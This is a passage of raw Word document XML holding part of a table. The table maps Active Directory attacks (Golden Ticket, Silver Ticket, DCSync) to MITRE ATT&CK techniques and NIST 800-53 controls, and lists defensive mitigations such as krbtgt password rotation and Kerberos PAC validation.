          </w:tcPr>
          <w:p w14:paraId="16386495" w14:textId="43DB9A69" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Force AES256-encryption only for Kerberos (disable RC4 / DES fallback via automated Domain Controller configuration script).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6E74" w14:paraId="17E21F56" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67B1EDCA" w14:textId="50A2A442" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Golden Ticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FFC5CA3" w14:textId="294D1A08" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">T1558.001: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Forge Kerberos Tickets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50017894" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C06D76C" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D581BF" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B3F8A20" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>IA-5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79B02A8D" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F7AB586" w14:textId="590E8082" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SC-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="044E1997" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement an automated dual-rotation cycle of the Domain Controller </w:t>
            </w:r>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>krbtgt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> account password every 180 days using secure orchestration tools.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02667969" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2192CD7E" w14:textId="41ABD604" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Restrict Domain Admin, Schema Admin, and Enterprise Admin access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6E74" w14:paraId="64C2144D" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FD83512" w14:textId="575E9DD7" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Silver Ticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6478D864" w14:textId="3104EF0D" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">T1558.002: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Forge Kerberos Tickets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F70113F" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="537C0339" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5655222F" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="072C43D3" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>IA-5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="658130B2" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B1260E7" w14:textId="359BCA4B" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SC-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30BB52E6" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Enforce regular, automated computer account password </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>changes (machine account passwords).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07431531" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5B1C38F6" w14:textId="2D40CE75" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Enforce Kerberos PAC (Privilege Attribute Certificate) validation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6E74" w14:paraId="7C50A0DF" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E5EBAB6" w14:textId="054E1402" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>DCSync</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="032D9EEE" w14:textId="20790CB8" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">T1003.006: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Credential Dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BCDB2FA" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="021FC23A" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462CD493" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0836B687" w14:textId="3F724444" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SI-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="604A3019" w14:textId="46F18482" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Automatically audit Active Directory Domain Root ACLs </w:t>
            </w:r>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Replicating Directory Changes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> permissions.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EAF37CC" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36051703" w14:textId="62FC75EF" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
